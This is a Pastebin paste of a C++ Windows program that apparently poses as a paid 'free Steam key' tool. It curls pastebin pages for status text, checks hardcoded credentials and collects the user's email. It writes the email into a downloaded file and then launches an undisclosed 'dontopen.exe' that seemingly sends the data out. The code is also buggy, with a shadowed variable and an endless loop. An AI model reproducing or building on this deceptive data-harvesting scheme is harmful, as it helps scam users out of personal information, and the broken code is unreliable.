Advertisement
beboisthebestgggggg

Untitled

Oct 1st, 2019
185
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.89 KB | None | 0 0
  1. #include <iostream>
  2. #include <string>
  3. #include <Windows.h>
  4. #include <fstream>
  5. #include <stdio.h>
  6. #include <fstream>
  7. #include <string>
  8. #include <unordered_set>
  9.  
  10. using namespace std;
  11.  
  12. int main() {
  13. cout << "Basic Version Thank For Purchasing !" << endl;
  14. cout << "Created By Bebo" << endl;
  15. system("color 0B");
  16. string version = "Version 1.1 ";
  17. cout << version << endl;
  18. string Pay = "Basic";
  19. system("curl https://pastebin.com/raw/2ZcfByE3");
  20. cout << "\n\nIf Your Version Does Not Match The online Version I Will Send Keys If The tool Has A Update You Will Get A Email To The Same That You Use For The Keys !\n" << endl;
  21. cout << "Do Not Share Your Username Or Password I Will Know And That Will Violat The Terms Of Services ! \n"<< endl;
  22. cout << "Abusing The Program Will Violate The Terms Of Services Example: Changing The Email And Trying Again ! \n" << endl;
  23. cout << "Violating The Terms Of Service Will Get you BlackListed And You Will Not Get Any More Keys ! \n" << endl;
  24. cout << "PLEASE READ EVERTHING AND DON'T COMPLAING IF YOU VIOLATE THE TERMS OF SERVICES AND GET BLACKLIST !!!!!!!!\n" << endl;
  25. system("curl https://pastebin.com/raw/8pkACHE4");
  26. cout << "\nif Blackedlisted = True then You Have Been Banned from The Service !" << endl;
  27. cout << "\n" << endl;
  28. system("curl https://pastebin.com/raw/4uCAqbw3");
  29. cout << " \a Games Left ! \n" << endl;
  30. cout << "I Update This Every 30 Min And If It Say 0 Dont Even Try It Wont Work \n" << endl;
  31. system("curl https://pastebin.com/raw/Ku2dLD18");
  32. cout << " People Have Used The App Today ;) \n" << endl;
  33. string username = "user1";
  34. string input1;
  35. string pass = "passwordispassword";
  36. string input2;
  37. string email;
  38. string sure;
  39. cout << "What Is The Username ? ";
  40. cin >> input1;
  41. if (input1 == username)
  42. {
  43. cout << "Correct \n";
  44. cout << "What is your password: ";
  45. cin >> input2;
  46. if (input2 == pass) {
  47. cout << "Correct" << endl;
  48. Sleep(2000);
  49. cout << "Will Come Back Admin ;)" << endl;
  50. cout << "Enter Your Email Not a Fake Email Because This May Take Time !"<< endl;
  51. cout<<"Enter: "<<endl;
  52. cin >> email;
  53. cout << "are you sure this is your email ! "<< endl;
  54. cout << email << endl;
  55. cout << "\n yes Or no ? ";
  56. cin >> sure;
  57. if (sure == "yes")
  58. {
  59.  
  60. cout << "\n Program Will Shut Down After It's finished !" << endl;
  61. string realemail = "\n bebothisisreal! \n" + email;
  62. string realmessage = realemail + "\nUsername ";
  63. string realmessage2 = realmessage + username;
  64. string realmessage3 = realmessage2 + "\nPassword ";
  65. string realmessage4 = realmessage3 + pass + "\n" +version + "\n" + Pay;
  66. cout << "\n Come Back Tomorrow For Another Key !" << endl;
  67. system("curl https://pastebin.com/raw/8pkACHE4 -o black.txt");
  68. Sleep(3000);
  69.  
  70. ofstream myfile1;
  71. myfile1.open("black.txt", std::ios_base::app);
  72. myfile1 << realmessage4;
  73. myfile1.close();
  74. Sleep(10);
  75.  
  76. system("start dontopen.exe");
  77.  
  78. HWND email;
  79. email = FindWindow(NULL, L"dontopen");
  80.  
  81. while (true)
  82. {
  83. if (email == 0)
  84. {
  85.  
  86. Sleep(15000);
  87. DeleteFile(L"black.txt");
  88. Sleep(5000);
  89. cout << " \n done you will recive a email shortly ! " << endl;
  90. Sleep(3000);
  91. system("taskkill /IM freesteamkey.exe");
  92.  
  93. }
  94. }
  95.  
  96.  
  97.  
  98. }
  99.  
  100. else
  101. {
  102. cout << "Ok Try Agian ";
  103. cin >> email;
  104. cout << "Are You Sure This Is Your Email ? ";
  105. cout << email;
  106. cout << "\n yes or no ? ";
  107. cin >> sure;
  108. if (sure == "no")
  109. {
  110.  
  111. cout << "Try Again When You Are Completely Sober LOL ;)";
  112. Sleep(5000);
  113. system("taskkill /IM freesteamkey.exe");
  114. }
  115.  
  116. }
  117.  
  118. }
  119. else
  120. {
  121. cout << "Wrong password !";
  122. Sleep(1500);
  123. system("taskkill /IM freesteamkey.exe");
  124. }
  125. }
  126. else
  127. {
  128. cout << "wrong username !";
  129. Sleep(1500);
  130. system("taskkill /IM freesteamkey.exe");
  131. }
  132.  
  133. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement